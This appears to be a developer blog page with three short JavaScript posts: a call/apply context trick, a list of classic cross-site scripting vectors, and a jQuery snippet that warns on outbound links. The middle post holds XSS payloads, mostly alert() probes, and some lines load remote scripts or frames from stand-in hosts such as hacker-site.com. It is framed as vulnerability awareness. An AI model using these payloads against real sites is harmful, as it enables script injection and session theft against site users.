Happen to see this nice cool JavaScript code somewhere in web.
//
function is(it) {
alert(this+" is " +it);
}
is("global"); // [object Window] is global
is.call(5,"number"); // 5 is number
is.apply("A", ['string']); // A is string
alert.is=is;
alert.is("function"); // function alert() { [native code] } is function
//
is it JavaScript? its upto you to call or apply.
Hope JavaScript folks enjoy this.
This is not about what is “Cross site scripting” but which part of your code has vulnerabilities.
// //External script: <script type="text/javascript" src="http://hacker-site.com/xss.js"></script> //Embedded script: <script type="text/javascript"> alert(“XSS”);</script> //
<!-- -->
<BODY ONLOAD=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG SRC="javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<TABLE BACKGROUND="javascript:alert('XSS')">
<TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
<!-- -->
It is good practice to warn users while navigating away from one domain to another. How to achieve this using jQuery?
The code snippet below demonstrate this
$("a[href^='http://']:not([href*='"+location.hostname+"']), [href^='https://']:not([href*='"+location.hostname+"'])")
.attr("target","_blank")
.click(function(e) {
alert('You are leaving this website and going somewhere else');
});
Hope this helps!!
Credit goes to Alex Staveley and open web.
